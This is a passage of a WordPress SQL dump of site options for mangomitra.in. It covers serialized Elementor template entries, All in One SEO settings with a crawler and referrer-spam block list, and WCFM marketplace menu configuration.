Blog &#8211; Archive 2\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-2-350-Copy.jpg\";s:12:\"tmpl_created\";i:1606215663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:674;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:431;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:819;a:20:{s:4:\"tmpl\";i:1071;s:2:\"id\";i:15528;s:5:\"title\";s:26:\"Travel Blog &#8211; Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Footer.jpg\";s:12:\"tmpl_created\";i:1606215673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:26:\"[\"Blog\",\"Footer\",\"Travel\"]\";s:10:\"menu_order\";i:675;s:16:\"popularity_index\";i:656;s:11:\"trend_index\";i:377;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:820;a:20:{s:4:\"tmpl\";i:1067;s:2:\"id\";i:15536;s:5:\"title\";s:26:\"Travel Blog &#8211; Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Header.jpg\";s:12:\"tmpl_created\";i:1606215625;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:26:\"[\"Blog\",\"Header\",\"Travel\"]\";s:10:\"menu_order\";i:676;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:228;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:821;a:20:{s:4:\"tmpl\";i:1072;s:2:\"id\";i:15545;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-1-350.jpg\";s:12:\"tmpl_created\";i:1606215684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:677;s:16:\"popularity_index\";i:669;s:11:\"trend_index\";i:482;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:822;a:20:{s:4:\"tmpl\";i:1066;s:2:\"id\";i:15556;s:5:\"title\";s:33:\"Travel Blog &#8211; Single Post 2\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-2-350.jpg\";s:12:\"tmpl_created\";i:1606215613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:678;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:454;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','off'),(986,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:101:\"Introducing Elementor 3.27: Flexible Grids, Better Security, Enhanced Accessibility & More Creativity\";s:7:\"excerpt\";s:409:\"Elementor 3.27 is packed with features designed to give you more control, boost your site’s performance, enhance accessibility, and take your creativity to new heights. This version is all about solving real challenges—whether it’s designing intricate Grid layouts, embedding modern video formats, or adding effortless animations, Elementor 3.27 makes your workflow smoother and your websites smarter.\r\n\";s:7:\"created\";i:1738142681;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:155:\"https://elementor.com/blog/elementor-327-grid-layouts-local-google-fonts-ai-motion/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:62:\"Introducing Hello Biz: A New Beginner Friendly WordPress Theme\";s:7:\"excerpt\";s:226:\"The first in a new collection of beginner-friendly Hello Themes, Hello Biz aims to make building Professional websites easier. Designed to streamline website creation, by helping you build a polished, high-performance website.\";s:7:\"created\";i:1736335773;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:121:\"https://elementor.com/blog/introducing-hello-biz/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:65:\"Introducing Elementor 3.26: Dynamic Design & Enhanced Performance\";s:7:\"excerpt\";s:192:\"Boost your site’s speed and performance with optimized CSS and a cleaner DOM, create dynamic content with an Off-Canvas modal from Loop Grids, and leverage the new AdBlock detection trigger.\";s:7:\"created\";i:1736174778;s:5:\"badge\";s:3:\"NEW\";s:3:\"url\";s:146:\"https://elementor.com/blog/elementor-326-off-canvas-loop-grid-performance/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','off'),(989,'aioseo_options','{\"internal\":[],\"webmasterTools\":{\"google\":null,\"bing\":null,\"yandex\":null,\"baidu\":null,\"pinterest\":null,\"alexa\":null,\"norton\":null,\"miscellaneousVerification\":null},\"breadcrumbs\":{\"enable\":true,\"separator\":\"&raquo;\",\"homepageLink\":true,\"homepageLabel\":\"Home\",\"breadcrumbPrefix\":null,\"archiveFormat\":\"Archives for #breadcrumb_archive_post_type_name\",\"searchResultFormat\":\"Search Results for \'#breadcrumb_search_string\'\",\"errorFormat404\":\"404 - Page Not Found\",\"showCurrentItem\":true,\"linkCurrentItem\":false,\"categoryFullHierarchy\":false,\"showBlogHome\":false},\"rssContent\":{\"before\":null,\"after\":\"&lt;p&gt;The post #post_link first appeared on #site_link.&lt;\\/p&gt;\"},\"advanced\":{\"truSeo\":true,\"headlineAnalyzer\":true,\"seoAnalysis\":true,\"dashboardWidget\":true,\"announcements\":true,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"uninstall\":false},\"sitemap\":{\"general\":{\"enable\":true,\"filename\":\"sitemap\",\"indexes\":true,\"linksPerIndex\":1000,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"attachment\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"author\":false,\"date\":false,\"additionalPages\":{\"enable\":false,\"pages\":[]},\"advancedSettings\":{\"enable\":false,\"excludeImages\":false,\"excludePosts\":[],\"excludeTerms\":[],\"priority\":{\"homePage\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"postTypes\":{\"grouped\":true,\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"taxonomies\":{\"grouped\":true,\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"archive\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"author\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"}}}},\"rss\":{\"enable\":true,\"linksPerIndex\":50,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]}},\"html\":{\"enable\":true,\"pageUrl\":\"\",\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"sortOrder\":\"publish_date\",\"sortDirection\":\"asc\",\"publicationDate\":true,\"compactArchives\":false,\"advancedSettings\":{\"enable\":false,\"nofollowLinks\":false,\"excludePosts\":[],\"excludeTerms\":[]}}},\"social\":{\"profiles\":{\"sameUsername\":{\"enable\":false,\"username\":null,\"included\":[\"facebookPageUrl\",\"twitterUrl\",\"pinterestUrl\",\"instagramUrl\",\"youtubeUrl\",\"linkedinUrl\"]},\"urls\":{\"facebookPageUrl\":null,\"twitterUrl\":null,\"instagramUrl\":null,\"pinterestUrl\":null,\"youtubeUrl\":null,\"linkedinUrl\":null,\"tumblrUrl\":null,\"yelpPageUrl\":null,\"soundCloudUrl\":null,\"wikipediaUrl\":null,\"myspaceUrl\":null,\"googlePlacesUrl\":null}},\"siteSocialProfiles\":null,\"facebook\":{\"general\":{\"enable\":true,\"defaultImageSourcePosts\":\"default\",\"customFieldImagePosts\":null,\"defaultImagePosts\":\"\",\"defaultImagePostsWidth\":\"\",\"defaultImagePostsHeight\":\"\",\"showAuthor\":true,\"siteName\":\"#site_title #separator_sa #tagline\"},\"homePage\":{\"image\":\"\",\"title\":\"\",\"description\":\"\",\"imageWidth\":\"\",\"imageHeight\":\"\",\"objectType\":\"website\"},\"advanced\":{\"enable\":false,\"adminId\":\"\",\"appId\":\"\",\"authorUrl\":\"\",\"generateArticleTags\":false,\"useKeywordsInTags\":true,\"useCategoriesInTags\":true,\"usePostTagsInTags\":true}},\"twitter\":{\"general\":{\"enable\":true,\"useOgData\":false,\"defaultCardType\":\"summary\",\"defaultImageSourcePosts\":\"default\",\"customFieldImagePosts\":null,\"defaultImagePosts\":\"\",\"showAuthor\":true,\"additionalData\":false},\"homePage\":{\"image\":\"\",\"title\":\"\",\"description\":\"\",\"cardType\":\"summary\"}}},\"searchAppearance\":{\"global\":{\"separator\":\"&#45;\",\"siteTitle\":\"#site_title #separator_sa #tagline\",\"metaDescription\":\"#tagline\",\"keywords\":null,\"schema\":{\"siteRepresents\":\"organization\",\"person\":null,\"organizationName\":\"My WordPress\",\"organizationLogo\":\"\",\"personName\":null,\"personLogo\":null,\"phone\":null,\"contactType\":null,\"contactTypeManual\":null}},\"advanced\":{\"globalRobotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noindexPaginated\":true,\"nofollowPaginated\":true,\"noindexFeed\":true,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"sitelinks\":true,\"noIndexEmptyCat\":true,\"removeStopWords\":false,\"noPaginationForCanonical\":true,\"useKeywords\":false,\"keywordsLooking\":true,\"useCategoriesForMetaKeywords\":false,\"useTagsForMetaKeywords\":false,\"dynamicallyGenerateKeywords\":false,\"pagedFormat\":\"- Page #page_number\"},\"archives\":{\"author\":{\"show\":true,\"title\":\"#author_name #separator_sa #site_title\",\"metaDescription\":\"#author_bio\",\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}},\"date\":{\"show\":true,\"title\":\"#archive_date #separator_sa #site_title\",\"metaDescription\":\"\",\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}},\"search\":{\"show\":false,\"title\":\"#search_term #separator_sa #site_title\",\"metaDescription\":\"\",\"advanced\":{\"robotsMeta\":{\"default\":false,\"noindex\":true,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}}}},\"tools\":{\"robots\":{\"enable\":false,\"rules\":[],\"robotsDetected\":true},\"importExport\":{\"backup\":{\"lastTime\":null,\"data\":null}}},\"deprecated\":{\"webmasterTools\":{\"googleAnalytics\":{\"id\":null,\"advanced\":false,\"trackingDomain\":null,\"multipleDomains\":false,\"additionalDomains\":null,\"anonymizeIp\":false,\"displayAdvertiserTracking\":false,\"excludeUsers\":[],\"trackOutboundLinks\":false,\"enhancedLinkAttribution\":false,\"enhancedEcommerce\":false}},\"searchAppearance\":{\"global\":{\"descriptionFormat\":null,\"schema\":{\"enableSchemaMarkup\":true}},\"advanced\":{\"autogenerateDescriptions\":true,\"runShortcodesInDescription\":true,\"useContentForAutogeneratedDescriptions\":false,\"excludePosts\":[],\"excludeTerms\":[]}},\"sitemap\":{\"general\":{\"advancedSettings\":{\"dynamic\":true}}},\"tools\":{\"blocker\":{\"blockBots\":null,\"blockReferer\":null,\"track\":null,\"custom\":{\"enable\":null,\"bots\":\"Abonti\\naggregator\\nAhrefsBot\\nasterias\\nBDCbot\\nBLEXBot\\nBuiltBotTough\\nBullseye\\nBunnySlippers\\nca-crawler\\nCCBot\\nCegbfeieh\\nCheeseBot\\nCherryPicker\\nCopyRightCheck\\ncosmos\\nCrescent\\ndiscobot\\nDittoSpyder\\nDotBot\\nDownload Ninja\\nEasouSpider\\nEmailCollector\\nEmailSiphon\\nEmailWolf\\nEroCrawler\\nExtractorPro\\nFasterfox\\nFeedBooster\\nFoobot\\nGenieo\\ngrub-client\\nHarvest\\nhloader\\nhttplib\\nHTTrack\\nhumanlinks\\nieautodiscovery\\nInfoNaviRobot\\nIstellaBot\\nJava\\/1.\\nJennyBot\\nk2spider\\nKenjin Spider\\nKeyword Density\\/0.9\\nlarbin\\nLexiBot\\nlibWeb\\nlibwww\\nLinkextractorPro\\nlinko\\nLinkScan\\/8.1a Unix\\nLinkWalker\\nLNSpiderguy\\nlwp-trivial\\nmagpie\\nMata Hari\\nMaxPointCrawler\\nMegaIndex\\nMicrosoft URL Control\\nMIIxpc\\nMippin\\nMissigua Locator\\nMister PiX\\nMJ12bot\\nmoget\\nMSIECrawler\\nNetAnts\\nNICErsPRO\\nNiki-Bot\\nNPBot\\nNutch\\nOffline Explorer\\nOpenfind\\npanscient.com\\nPHP\\/5.{\\nProPowerBot\\/2.14\\nProWebWalker\\nPython-urllib\\nQueryN Metasearch\\nRepoMonkey\\nSISTRIX\\nsitecheck.Internetseer.com\\nSiteSnagger\\nSnapPreviewBot\\nSogou\\nSpankBot\\nspanner\\nspbot\\nSpinn3r\\nsuzuran\\nSzukacz\\/1.4\\nTeleport\\nTelesoft\\nThe Intraformant\\nTheNomad\\nTightTwatBot\\nTitan\\ntoCrawl\\/UrlDispatcher\\nTrue_Robot\\nturingos\\nTurnitinBot\\nUbiCrawler\\nUnisterBot\\nURLy Warning\\nVCI\\nWBSearchBot\\nWeb Downloader\\/6.9\\nWeb Image Collector\\nWebAuto\\nWebBandit\\nWebCopier\\nWebEnhancer\\nWebmasterWorldForumBot\\nWebReaper\\nWebSauger\\nWebsite Quester\\nWebster Pro\\nWebStripper\\nWebZip\\nWotbox\\nwsr-agent\\nWWW-Collector-E\\nXenu\\nZao\\nZeus\\nZyBORG\\ncoccoc\\nIncutio\\nlmspider\\nmemoryBot\\nserf\\nUnknown\\nuptime files\",\"referer\":\"semalt.com\\nkambasoft.com\\nsavetubevideo.com\\nbuttons-for-website.com\\nsharebutton.net\\nsoundfrost.org\\nsrecorder.com\\nsoftomix.com\\nsoftomix.net\\nmyprintscreen.com\\njoinandplay.me\\nfbfreegifts.com\\nopenmediasoft.com\\nzazagames.org\\nextener.org\\nopenfrost.com\\nopenfrost.net\\ngooglsucks.com\\nbest-seo-offer.com\\nbuttons-for-your-website.com\\nwww.Get-Free-Traffic-Now.com\\nbest-seo-solution.com\\nbuy-cheap-online.info\\nsite3.free-share-buttons.com\\nwebmaster-traffic.com\"}}}}}','yes'),(990,'aioseo_options_lite','{\"advanced\":{\"usageTracking\":false}}','yes'),(1030,'dc_vendors_permalinks','a:1:{s:16:\"vendor_shop_base\";s:0:\"\";}','yes'),(1110,'wc_pwb_admin_tab_brand_single_position','after_meta','yes'),(1111,'pwb_activate_on','1643093324','yes'),(1112,'old_wc_pwb_admin_tab_slug','brand','yes'),(1113,'widget_pwb_list_widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:4:{s:5:\"title\";s:15:\"						Brands			\";s:10:\"display_as\";s:10:\"brand_name\";s:7:\"columns\";s:1:\"2\";s:10:\"hide_empty\";s:2:\"on\";}}','yes'),(1114,'widget_pwb_dropdown_widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:0:{}}','yes'),(1115,'widget_pwb_filter_by_brand_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1142,'_transient_health-check-site-status-result','{\"good\":14,\"recommended\":2,\"critical\":1}','yes'),(1265,'db_upgraded','1','on'),(1268,'auto_core_update_notified','a:4:{s:4:\"type\";s:4:\"fail\";s:5:\"email\";s:18:\"namaste@gopalak.in\";s:7:\"version\";s:5:\"6.8.1\";s:9:\"timestamp\";i:1746041108;}','off'),(1709,'wcfmmp_page_install','1','yes'),(1710,'wcfmmp_table_install','1','yes'),(1713,'wcfmmp_updated_3_3_10','1','yes'),(1715,'wc_frontend_manager_page_id','633','yes'),(1716,'wcfm_page_options','a:3:{s:27:\"wc_frontend_manager_page_id\";s:3:\"633\";s:30:\"wcfm_vendor_membership_page_id\";s:3:\"635\";s:32:\"wcfm_vendor_registration_page_id\";s:3:\"636\";}','yes'),(1717,'wcfm_db_version','6.6.1','yes'),(1718,'wcfm_page_install','1','yes'),(1746,'wcfm_knowledgebase_category_children','a:0:{}','yes'),(1747,'wcfm_knowledgebase_category_install','1','yes'),(1750,'wcfm_disable_vendor_installed','1','yes'),(1751,'wcfm_updated_6_5_2','1','yes'),(1752,'wcfm_updated_6_5_5','1','yes'),(1754,'widget_wcfmmp-store-info','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1755,'widget_wcfmmp-store-location','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1756,'widget_wcfmmp-store-category','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1757,'widget_wcfmmp-store-taxonomy','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1758,'widget_wcfmmp-store-hours-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1759,'widget_wcfmmp-store-shipping-rules-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1760,'widget_wcfmmp-store-coupons','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1761,'widget_wcfmmp-store-product-search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1762,'widget_wcfmmp-store-featured-products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1763,'widget_wcfmmp-store-top-products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1764,'widget_wcfmmp-store-top-rated-products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1765,'widget_wcfmmp-store-on-sale-products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1766,'widget_wcfmmp-store-recent-products','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1767,'widget_wcfmmp-store-recent-articles','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1768,'widget_wcfmmp-store-lists-search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1769,'widget_wcfmmp-store-lists-category-filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1770,'widget_wcfmmp-store-lists-location-filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1771,'widget_wcfmmp-store-lists-radius-filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1772,'widget_wcfmmp-store-lists-meta-filter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1773,'widget_wcfmmp-store-top-rated-vendors','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1774,'widget_wcfmmp-store-best-selling-vendors','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1775,'widget_wcfmmp-products-search-by-vendors','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(1776,'wcfm_table_install','1','yes'),(1777,'wcfm_updated_6_4_1','1','yes'),(1778,'wcfm_updated_end_point_refund','1','yes'),(1779,'wcfm_updated_end_point_reviews','1','yes'),(1781,'wcfm_updated_end_point_wcfm_vendors','1','yes'),(1783,'wcfm_updated_end_point_Enquiry','1','yes'),(1784,'wcfm_updated_end_point_wcfm_customers','1','yes'),(1785,'wcfm_updated_end_point_wcfm_articles','1','yes'),(1786,'wcfm_updated_end_point_payment','1','yes'),(1787,'wcfm_updated_end_point_media','1','yes'),(1794,'wcfm_vendor_membership_page_id','635','yes'),(1795,'wcfm_vendor_registration_page_id','636','yes'),(1796,'wcfmvm_page_install','1','yes'),(1797,'wcfmvm_table_install','1','yes'),(1799,'wcvendors_vendor_allow_registration','no','yes'),(1801,'wcfm_updated_end_point_wcfmvm_vendor_membership','1','yes'),(1810,'_transient_wcfm-notification-notice','0','yes'),(1814,'wcfmvm_membership_scheduler','a:1:{s:7:\"updated\";i:1747374281;}','off'),(1857,'wcfm_updated_end_point_ledger','1','yes'),(1891,'wcfm_site_logo','','yes'),(1892,'wcfm_store_endpoints','a:6:{s:5:\"about\";s:0:\"\";s:8:\"articles\";s:0:\"\";s:8:\"policies\";s:0:\"\";s:7:\"reviews\";s:0:\"\";s:9:\"followers\";s:0:\"\";s:10:\"followings\";s:0:\"\";}','yes'),(1893,'wcfm_myac_endpoints','a:2:{s:7:\"inquiry\";s:0:\"\";s:12:\"view-inquiry\";s:0:\"\";}','yes'),(1894,'wcfm_my_store_label','My Store','yes'),(1895,'wcfm_home_menu_label','Home','yes'),(1896,'wcfm_managed_menus','a:17:{i:0;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:5:\"Media\";s:4:\"icon\";s:5:\"image\";s:4:\"slug\";s:10:\"wcfm-media\";s:3:\"url\";s:46:\"https://www.mangomitra.in/store-manager/media/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:1;a:13:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:8:\"Articles\";s:4:\"icon\";s:8:\"file-alt\";s:4:\"slug\";s:13:\"wcfm-articles\";s:3:\"url\";s:49:\"https://www.mangomitra.in/store-manager/articles/\";s:10:\"capability\";s:17:\"wcfm_article_menu\";s:7:\"has_new\";s:3:\"yes\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:56:\"https://www.mangomitra.in/store-manager/articles-manage/\";s:9:\"new_class\";s:34:\"wcfm_sub_menu_items_article_manage\";s:18:\"submenu_capability\";s:29:\"wcfm_add_new_article_sub_menu\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:2;a:13:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:8:\"Products\";s:4:\"icon\";s:4:\"cube\";s:4:\"slug\";s:13:\"wcfm-products\";s:3:\"url\";s:49:\"https://www.mangomitra.in/store-manager/products/\";s:10:\"capability\";s:17:\"wcfm_product_menu\";s:7:\"has_new\";s:3:\"yes\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:56:\"https://www.mangomitra.in/store-manager/products-manage/\";s:9:\"new_class\";s:34:\"wcfm_sub_menu_items_product_manage\";s:18:\"submenu_capability\";s:29:\"wcfm_add_new_product_sub_menu\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:3;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:6:\"Orders\";s:4:\"icon\";s:13:\"shopping-cart\";s:4:\"slug\";s:11:\"wcfm-orders\";s:3:\"url\";s:51:\"https://www.mangomitra.in/store-manager/orderslist/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:4;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:10:\"Withdrawal\";s:4:\"icon\";s:11:\"credit-card\";s:4:\"slug\";s:24:\"wcfm-withdrawal-requests\";s:3:\"url\";s:60:\"https://www.mangomitra.in/store-manager/withdrawal-requests/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:5;a:13:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:7:\"Coupons\";s:4:\"icon\";s:4:\"gift\";s:4:\"slug\";s:12:\"wcfm-coupons\";s:3:\"url\";s:48:\"https://www.mangomitra.in/store-manager/coupons/\";s:10:\"capability\";s:16:\"wcfm_coupon_menu\";s:7:\"has_new\";s:3:\"yes\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:55:\"https://www.mangomitra.in/store-manager/coupons-manage/\";s:9:\"new_class\";s:33:\"wcfm_sub_menu_items_coupon_manage\";s:18:\"submenu_capability\";s:28:\"wcfm_add_new_coupon_sub_menu\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:6;a:13:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:13:\"Store Vendors\";s:4:\"icon\";s:8:\"user-alt\";s:4:\"slug\";s:12:\"wcfm-vendors\";s:3:\"url\";s:48:\"https://www.mangomitra.in/store-manager/vendors/\";s:10:\"capability\";s:17:\"wcfm_vendors_menu\";s:7:\"has_new\";s:3:\"yes\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:52:\"https://www.mangomitra.in/store-manager/vendors-new/\";s:9:\"new_class\";s:34:\"wcfm_sub_menu_items_vendors_manage\";s:18:\"submenu_capability\";s:29:\"wcfm_add_new_vendors_sub_menu\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:7;a:13:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:9:\"Customers\";s:4:\"icon\";s:11:\"user-circle\";s:4:\"slug\";s:14:\"wcfm-customers\";s:3:\"url\";s:50:\"https://www.mangomitra.in/store-manager/customers/\";s:10:\"capability\";s:18:\"wcfm_customer_menu\";s:7:\"has_new\";s:3:\"yes\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:57:\"https://www.mangomitra.in/store-manager/customers-manage/\";s:9:\"new_class\";s:35:\"wcfm_sub_menu_items_customer_manage\";s:18:\"submenu_capability\";s:30:\"wcfm_add_new_customer_sub_menu\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:8;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:11:\"Memberships\";s:4:\"icon\";s:9:\"user-plus\";s:4:\"slug\";s:16:\"wcfm-memberships\";s:3:\"url\";s:52:\"https://www.mangomitra.in/store-manager/memberships/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_c